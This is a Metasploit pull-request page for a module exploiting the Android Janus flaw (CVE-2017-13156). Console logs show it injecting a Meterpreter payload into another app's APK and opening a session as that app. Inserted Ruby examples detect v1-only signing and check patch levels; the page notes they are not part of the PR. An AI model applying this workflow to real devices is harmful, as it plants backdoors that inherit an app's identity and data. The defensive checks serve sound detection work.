
CVE-2017-13156 Janus LPE for Android #12227

Merged
merged 8 commits into from Nov 7, 2019

Conversation

@timwr
Contributor

timwr commented Aug 24, 2019

This module exploits CVE-2017-13156 in Android to install a payload into another application. The payload APK will have the same signature and can be installed as an update, preserving the existing data.

The vulnerability was fixed in the 5th December 2017 security patch, and was additionally fixed by the APK Signature scheme v2, so only APKs signed with the v1 scheme are vulnerable.

Verification

List the steps needed to make sure this thing works

$ apksigner verify -verbose notvulnerable.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Number of signers: 1
$ apksigner verify -verbose vulnerablecamerasample.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): false
  • Run the module, and manually install the application on the device
  • Verify you get a new session as the target application

In the future, this could be combined with the EvilParcel vulnerability to automatically install the application on the device.
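The apksigner output above is the manual way to tell a v1-only APK from one that also carries v2. The same determination can be made by parsing the ZIP container directly, which is what a scanner or app-store ingest pipeline would do at scale. The Ruby below is an added example, not code from this PR or from Metasploit: it finds the ZIP end-of-central-directory record, looks for the APK Signing Block that sits immediately before the central directory, reports which scheme IDs the block holds (0x7109871a for v2 and 0xf05368c0 for v3, the values assigned by the APK Signature Scheme specification), and also flags a file whose first bytes are a DEX header while it still parses as a ZIP, which is the shape a Janus-crafted file takes and therefore a cheap detection signal. `build_sample_apk` constructs a minimal stand-in archive with a placeholder signing block so the example runs offline; it is not a real APK and its signing block carries no real signature.

```ruby
# Added example (not part of the PR or Metasploit): classify an APK by the
# signature schemes its container carries and flag the Janus file shape.
DEX_MAGIC           = "dex\n".b             # first 4 bytes of a DEX header
APK_SIG_BLOCK_MAGIC = "APK Sig Block 42".b  # trailer of the APK Signing Block
EOCD_SIG    = 0x06054b50                    # ZIP end-of-central-directory record
V2_BLOCK_ID = 0x7109871a                    # APK Signature Scheme v2 pair ID
V3_BLOCK_ID = 0xf05368c0                    # APK Signature Scheme v3 pair ID

# Locate the EOCD record, scanning back over an optional ZIP comment.
def find_eocd(bytes)
  pos = bytes.bytesize - 22
  floor = [pos - 0xffff, 0].max
  while pos >= floor
    return pos if bytes.byteslice(pos, 4).unpack1("V") == EOCD_SIG
    pos -= 1
  end
  nil
end

# Return the pair IDs in the APK Signing Block (empty if absent), or nil if
# the bytes are not a ZIP at all. The block sits directly before the central
# directory: u64 size | id-value pairs | u64 size | 16-byte magic.
def signing_block_ids(bytes)
  eocd = find_eocd(bytes)
  return nil unless eocd
  cd_offset = bytes.byteslice(eocd + 16, 4).unpack1("V")
  return [] if cd_offset < 24
  return [] unless bytes.byteslice(cd_offset - 16, 16) == APK_SIG_BLOCK_MAGIC
  size  = bytes.byteslice(cd_offset - 24, 8).unpack1("Q<")
  start = cd_offset - size - 8
  return [] if start < 0
  ids = []
  pos = start + 8               # skip the leading size field
  pairs_end = cd_offset - 24    # the trailing size field begins here
  while pos + 12 <= pairs_end
    len = bytes.byteslice(pos, 8).unpack1("Q<")   # length of id + value
    ids << bytes.byteslice(pos + 8, 4).unpack1("V")
    pos += 8 + len
  end
  ids
end

def analyze_apk(bytes)
  ids = signing_block_ids(bytes)
  v2 = ids.to_a.include?(V2_BLOCK_ID)
  v3 = ids.to_a.include?(V3_BLOCK_ID)
  {
    zip: !ids.nil?,
    dex_prefix: bytes.byteslice(0, 4) == DEX_MAGIC,  # Janus file shape
    v2: v2,
    v3: v3,
    v1_only: !ids.nil? && !v2 && !v3   # the case the PR calls vulnerable
  }
end

# Constructed minimal ZIP (one stored entry) standing in for an APK.
def build_sample_apk(v2_block: false, dex_prefix: false)
  name = "classes.dex".b
  data = "stub".b
  prefix = dex_prefix ? "dex\n035\0".b : "".b
  local = [0x04034b50, 20, 0, 0, 0, 0, 0, data.bytesize, data.bytesize,
           name.bytesize, 0].pack("VvvvvvVVVvv") + name + data
  sig = "".b
  if v2_block
    value = ("\x00" * 8).b                  # placeholder signer data (constructed)
    pair  = [value.bytesize + 4].pack("Q<") + [V2_BLOCK_ID].pack("V") + value
    size  = pair.bytesize + 8 + 16          # pairs + trailing size + magic
    sig   = [size].pack("Q<") + pair + [size].pack("Q<") + APK_SIG_BLOCK_MAGIC
  end
  cd_offset = prefix.bytesize + local.bytesize + sig.bytesize
  central = [0x02014b50, 20, 20, 0, 0, 0, 0, 0, data.bytesize, data.bytesize,
             name.bytesize, 0, 0, 0, 0, 0, prefix.bytesize].pack("VvvvvvvVVVvvvvvVV") + name
  eocd = [0x06054b50, 0, 0, 1, 1, central.bytesize, cd_offset, 0].pack("VvvvvVVv")
  prefix + local + sig + central + eocd
end

if __FILE__ == $PROGRAM_NAME
  p analyze_apk(build_sample_apk)                     # v1_only: true
  p analyze_apk(build_sample_apk(v2_block: true))     # v2: true, v1_only: false
  p analyze_apk(build_sample_apk(dex_prefix: true))   # dex_prefix: true
end
```

A `v1_only` result means the installed package would accept an update that relies on JAR signing alone; the `dex_prefix` flag is the one to alert on at ingest, since an APK built by normal tooling begins with the ZIP local header signature, not a DEX header.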

@timwr

Contributor Author

timwr commented Aug 24, 2019

msf5 exploit(android/local/janus) > run

[*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.phonegap.camerasample.syerq
[*] Loading /tmp/d20190824-7164-qydvgj/original/smali/com/phonegap/camerasample/CameraSampleActivity.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk
[*] Uploading APK: /sdcard/app.apk
[*] APK uploaded
msf5 exploit(android/local/janus) >
[*] Sending stage (72609 bytes)
[*] Meterpreter session 2 opened

msf5 exploit(android/local/janus) > sessions 2
[*] Starting interaction with 2...

meterpreter > pwd
/data/user/0/com.phonegap.camerasample/files

Ping @V-E-O, did you write the PoC? Can I add you as an author?

@bwatters-r7 bwatters-r7 self-assigned this Sep 3, 2019
@V-E-O


V-E-O commented Sep 4, 2019

@timwr It's okay, thanks.

@bwatters-r7 bwatters-r7 removed their assignment Sep 6, 2019
@timwr timwr force-pushed the timwr:janus branch from 5b41949 to 37011c5 Oct 17, 2019
@timwr timwr changed the title Initial commit of the CVE-2017-13156 Janus LPE for Android CVE-2017-13156 Janus LPE for Android Oct 17, 2019
@timwr timwr added android and removed needs-docs labels Oct 17, 2019
@space-r7 space-r7 self-assigned this Oct 29, 2019
@h00die

Contributor

h00die commented Nov 1, 2019

While only a little ugly, here's a case of a bad APK:

[*] Downloading APK: /system/app/VZNavigator.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.vznavigator.schi535.krmaj
[*] Loading /tmp/d20191101-12370-vc0me4/original/smali/com/navbuilder/app/atlasbook/NavBuilderApplication.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20191101-12370-vc0me4/output.apk
[-] I: Using Apktool 2.4.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
        at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:790)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:340)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
        at brut.androlib.Androlib.buildSources(Androlib.java:350)
        at brut.androlib.Androlib.build(Androlib.java:302)
        at brut.androlib.Androlib.build(Androlib.java:269)
        at brut.apktool.Main.cmdBuild(Main.java:247)
        at brut.apktool.Main.main(Main.java:79)
[-] Exploit failed: RuntimeError Unable to rebuild apk with apktool
@h00die

Contributor

h00die commented Nov 1, 2019

And another:

msf5 exploit(android/local/janus) > set package com.vzw.hs.android.modlite
package => com.vzw.hs.android.modlite
msf5 exploit(android/local/janus) > run

[*] Downloading APK: /system/app/VzTones.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[-] Exploit failed: RuntimeError Unable to find hook point in /tmp/d20191101-12370-1mqakdn/original/smali*/VTonesLauncher.smali
@h00die

Contributor

h00die commented Nov 1, 2019

According to https://stackoverflow.com/a/42977813 you can do a check on the security version if it's Lollipop or newer.
So a check method could hit that, and also check that if it's pre-Lollipop you won't know, but that's

4.4.2 gave me

getprop ro.build.version.security_patch

According to https://www.cvedetails.com/cve/CVE-2017-13156/ minimum version is 5.1.1. So could add an OS Version check in there as well.

I'll add a PR back on this.
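The version and patch-level checks sketched above can be expressed in a few lines of Ruby. The block below is an added example, not code from this PR or from the landed module: it parses the `[key]: [value]` lines that `getprop` prints, treats a release below 5.1.1 (the minimum the comment cites from cvedetails) as outside the listed affected range, treats an empty `ro.build.version.security_patch` (the 4.4.2 observation above) as unknown rather than patched, and otherwise compares the patch level against the 2017-12-05 date named in the PR description. The getprop excerpts are constructed, and the status symbols are my own naming.

```ruby
require "date"

# Added example (not from the PR or Metasploit): decide, from a device's
# build properties, whether the Janus fix can be assumed present.
JANUS_FIX_PATCH_LEVEL = Date.new(2017, 12, 5)  # patch level named in the PR description
MIN_LISTED_VERSION    = "5.1.1"                # lowest affected release per the cvedetails entry

# Parse `getprop` output lines of the form "[key]: [value]" into a Hash.
def parse_getprop(output)
  output.each_line.with_object({}) do |line, props|
    m = line.match(/\A\[([^\]]+)\]:\s*\[(.*)\]\s*\z/)
    props[m[1]] = m[2] if m
  end
end

# Compare dotted numeric versions; returns -1, 0 or 1 (missing parts count as 0).
def version_compare(a, b)
  pa = a.split(".").map(&:to_i)
  pb = b.split(".").map(&:to_i)
  n = [pa.size, pb.size].max
  (pa + [0] * (n - pa.size)) <=> (pb + [0] * (n - pb.size))
end

# :patched / :vulnerable when the patch level can be read;
# :unknown_patch_level when the property is absent or empty (as seen on 4.4.2);
# :below_listed_minimum when the release predates the affected range listed for the CVE.
def janus_patch_status(props)
  release = props["ro.build.version.release"].to_s.strip
  patch   = props["ro.build.version.security_patch"].to_s.strip
  return :unknown_release if release.empty?
  return :below_listed_minimum if version_compare(release, MIN_LISTED_VERSION) < 0
  return :unknown_patch_level if patch.empty?
  begin
    level = Date.strptime(patch, "%Y-%m-%d")
  rescue ArgumentError   # Date::Error is an ArgumentError subclass
    return :unparseable_patch_level
  end
  level >= JANUS_FIX_PATCH_LEVEL ? :patched : :vulnerable
end

# Constructed getprop excerpts (not captured from any real device).
SAMPLE_UNPATCHED = "[ro.build.version.release]: [7.1.2]\n" \
                   "[ro.build.version.security_patch]: [2017-11-05]\n"
SAMPLE_PATCHED   = "[ro.build.version.release]: [8.0.0]\n" \
                   "[ro.build.version.security_patch]: [2017-12-05]\n"
SAMPLE_KITKAT    = "[ro.build.version.release]: [4.4.2]\n"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_UNPATCHED, SAMPLE_PATCHED, SAMPLE_KITKAT].each do |sample|
    puts janus_patch_status(parse_getprop(sample))
  end
end
```

This is the kind of check a device-inventory or MDM compliance script would run; a status of `:unknown_patch_level` should be treated as unverified, never as patched.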

@h00die

Contributor

h00die commented Nov 3, 2019

@h00die

Contributor

h00die commented Nov 6, 2019

timwr#11

May need to update the info comment since it's now a random name :)

h00die and others added 2 commits Nov 6, 2019
@h00die

Contributor

h00die commented Nov 6, 2019

Travis looks unrelated; all passed but one, which timed out. Getting ready to land this now.

@h00die

Contributor

h00die commented Nov 6, 2019

Landed rapid7/metasploit-payloads#356 and @jmartin-r7 found an issue with the payload bump, waiting on him to land this.

@h00die h00die merged commit 5711eff into rapid7:master Nov 7, 2019
2 of 3 checks passed
continuous-integration/travis-ci/pr: The Travis CI build could not complete due to an error
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
@h00die h00die self-assigned this Nov 7, 2019
@h00die

Contributor

h00die commented Nov 7, 2019

Release Notes

This adds an LPE for Android CVE-2017-13156, named Janus.
